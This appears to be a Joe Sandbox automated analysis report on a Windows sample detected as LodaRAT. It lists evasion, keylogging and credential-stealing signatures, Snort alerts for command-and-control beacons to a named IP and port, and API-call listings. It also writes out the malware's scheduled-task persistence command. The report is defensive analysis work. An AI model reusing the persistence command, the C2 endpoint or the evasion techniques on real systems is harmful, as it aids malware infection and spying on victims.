Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bf-p2b.exe

Overview

General Information

Sample Name:bf-p2b.exe
Analysis ID:1350639
MD5:1446d857fe2760cff287a534295226f4
SHA1:79c0484ed853d1ab8ab3942854666c0c59363721
SHA256:dc93cb125eb5d10c02312b369ee50060e0a3ed28001864bba114dc28111e3cfd
Tags:Boredfluffexe
Infos:

Detection

LodaRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected LodaRAT
Yara detected LodaRat
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for sample
Contains functionality to modify clipboard data
Machine Learning detection for dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Contains functionality to query the security center for anti-virus and firewall products
Found evasive API chain (date check)
Contains functionality to execute programs as a different user
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Yara detected ProcessChecker
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
OS version to string mapping found (often used in BOTs)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Creates a start menu entry (Start Menu\Programs\Startup)
Potential key logger detected (key state polling based)
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • bf-p2b.exe (PID: 7420 cmdline: C:\Users\user\Desktop\bf-p2b.exe MD5: 1446D857FE2760CFF287A534295226F4)
    • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7512 cmdline: schtasks /create /tn JWPING.exe /tr C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
    • wscript.exe (PID: 7492 cmdline: WSCript C:\Users\user\AppData\Local\Temp\JWPING.vbs MD5: FF00E0480075B095948000BDC66E81F0)
  • Softwarefx-Acrobat-Reader.exe (PID: 7592 cmdline: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe MD5: 1446D857FE2760CFF287A534295226F4)
  • Softwarefx-Acrobat-Reader.exe (PID: 7632 cmdline: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe MD5: 1446D857FE2760CFF287A534295226F4)
  • Softwarefx-Acrobat-Reader.exe (PID: 7676 cmdline: "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe" MD5: 1446D857FE2760CFF287A534295226F4)
  • Softwarefx-Acrobat-Reader.exe (PID: 7808 cmdline: "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe" MD5: 1446D857FE2760CFF287A534295226F4)
  • Softwarefx-Acrobat-Reader.exe (PID: 8052 cmdline: "C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe" MD5: 1446D857FE2760CFF287A534295226F4)
  • Softwarefx-Acrobat-Reader.exe (PID: 6100 cmdline: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe MD5: 1446D857FE2760CFF287A534295226F4)
  • Softwarefx-Acrobat-Reader.exe (PID: 7704 cmdline: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exe MD5: 1446D857FE2760CFF287A534295226F4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_LodaRat_1Yara detected LodaRatJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\JWPING.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000002.2921107184.0000000003740000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
        00000003.00000002.2920013586.0000000003398000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
          Process Memory Space: bf-p2b.exe PID: 7420JoeSecurity_LodaRATYara detected LodaRATJoe Security
            Process Memory Space: bf-p2b.exe PID: 7420JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: wscript.exe PID: 7492JoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.4172.111.138.1004973655522849885 11/30/23-17:07:37.309723
                SID:2849885
                Source Port:49736
                Destination Port:5552
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4172.111.138.1004973655522822116 11/30/23-17:07:37.309723
                SID:2822116
                Source Port:49736
                Destination Port:5552
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:172.111.138.100192.168.2.45552497362830912 11/30/23-17:08:57.785609
                SID:2830912
                Source Port:5552
                Destination Port:49736
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\JWPING.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeReversingLabs: Detection: 48%
                Machine Learning detection for sample
                Source: bf-p2b.exeJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeJoe Sandbox ML: detected
                Source: bf-p2b.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B1DD92 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B1DD92
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B52044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B52044
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B5219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B5219F
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B4F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B4F350
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B524A9
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B46B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00B46B3F
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B4FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B4FDD2
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B4FD47 FindFirstFileW,FindClose,0_2_00B4FD47
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B46E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00B46E4A
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F22044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00F22044
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F2219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00F2219F
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F1F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00F1F350
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F224A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00F224A9
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F16B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,5_2_00F16B3F
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F1FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00F1FDD2
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EEDD92 GetFileAttributesW,FindFirstFileW,FindClose,5_2_00EEDD92
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F1FD47 FindFirstFileW,FindClose,5_2_00F1FD47
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F16E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,5_2_00F16E4A

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2849885 ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin 192.168.2.4:49736 -> 172.111.138.100:5552
                Source: TrafficSnort IDS: 2822116 ETPRO TROJAN Loda Logger CnC Beacon 192.168.2.4:49736 -> 172.111.138.100:5552
                Source: TrafficSnort IDS: 2830912 ETPRO TROJAN Loda Logger CnC Beacon Response M2 172.111.138.100:5552 -> 192.168.2.4:49736
                Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                Source: bf-p2b.exe, 00000000.00000002.2923860739.00000000047CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B5550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00B5550C

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to modify clipboard data
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B57294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B57294
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F27294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,_wcscpy,GlobalUnWire,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,5_2_00F27294
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B57099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_00B57099
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B6F5D0
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,5_2_00F3F5D0
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B44342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00B44342
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B57099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalFix,CloseClipboard,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalUnWire,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnWire,CountClipboardFormats,CloseClipboard,0_2_00B57099

                System Summary

                barindex
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                Source: bf-p2b.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B482D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B482D0
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F182D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,5_2_00F182D0
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B630AD0_2_00B630AD
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B136800_2_00B13680
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B0DCD00_2_00B0DCD0
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B0A0C00_2_00B0A0C0
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B201830_2_00B20183
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B3113E0_2_00B3113E
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B212F90_2_00B212F9
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B4220C0_2_00B4220C
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B3542F0_2_00B3542F
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6F5D00_2_00B6F5D0
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B085300_2_00B08530
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B066700_2_00B06670
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B206770_2_00B20677
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6A8DC0_2_00B6A8DC
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B3599F0_2_00B3599F
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B20A8F0_2_00B20A8F
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B06BBC0_2_00B06BBC
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B2AC830_2_00B2AC83
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B0BDF00_2_00B0BDF0
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B2BDF60_2_00B2BDF6
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B05D320_2_00B05D32
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B1AD5C0_2_00B1AD5C
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B34EBF0_2_00B34EBF
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B20EC40_2_00B20EC4
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B21E5A0_2_00B21E5A
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B4BFB80_2_00B4BFB8
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B37FFD0_2_00B37FFD
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B2DF690_2_00B2DF69
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EDDCD05_2_00EDDCD0
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EDA0C05_2_00EDA0C0
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F330AD5_2_00F330AD
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EF01835_2_00EF0183
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F0113E5_2_00F0113E
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EF12F95_2_00EF12F9
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F1220C5_2_00F1220C
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F0542F5_2_00F0542F
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3F5D05_2_00F3F5D0
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00ED85305_2_00ED8530
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EE36805_2_00EE3680
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EF06775_2_00EF0677
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00ED66705_2_00ED6670
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F3A8DC5_2_00F3A8DC
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F0599F5_2_00F0599F
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EF0A8F5_2_00EF0A8F
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00ED6BBC5_2_00ED6BBC
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EFAC835_2_00EFAC83
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EFBDF65_2_00EFBDF6
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EDBDF05_2_00EDBDF0
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EEAD5C5_2_00EEAD5C
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00ED5D325_2_00ED5D32
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EF0EC45_2_00EF0EC4
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F04EBF5_2_00F04EBF
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EF1E5A5_2_00EF1E5A
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F07FFD5_2_00F07FFD
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00F1BFB85_2_00F1BFB8
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: 5_2_00EFDF695_2_00EFDF69
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: String function: 00B1F885 appears 67 times
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: String function: 00B27750 appears 42 times
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: String function: 00EF7750 appears 42 times
                Source: C:\Users\user\AppData\Roaming\Windata\Softwarefx-Acrobat-Reader.exeCode function: String function: 00EEF885 appears 67 times
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B3B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,746A5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00B3B9F1
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B029C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00B029C2
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6F0A1 SendMessageW,NtdllDialogWndProc_W,0_2_00B6F0A1
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00B6F122
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B702AA NtdllDialogWndProc_W,0_2_00B702AA
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6F3AB NtdllDialogWndProc_W,0_2_00B6F3AB
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6F3DA NtdllDialogWndProc_W,0_2_00B6F3DA
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6F37C NtdllDialogWndProc_W,0_2_00B6F37C
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6F425 NtdllDialogWndProc_W,0_2_00B6F425
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6F45A ClientToScreen,NtdllDialogWndProc_W,0_2_00B6F45A
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6F594 GetWindowLongW,NtdllDialogWndProc_W,0_2_00B6F594
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B6F5D0
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B1B7F2 NtdllDialogWndProc_W,0_2_00B1B7F2
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B1B845 NtdllDialogWndProc_W,0_2_00B1B845
                Source: C:\Users\user\Desktop\bf-p2b.exeCode function: 0_2_00B6EA4E NtdllDialogWndProc_W,0_2_00B6EA4E
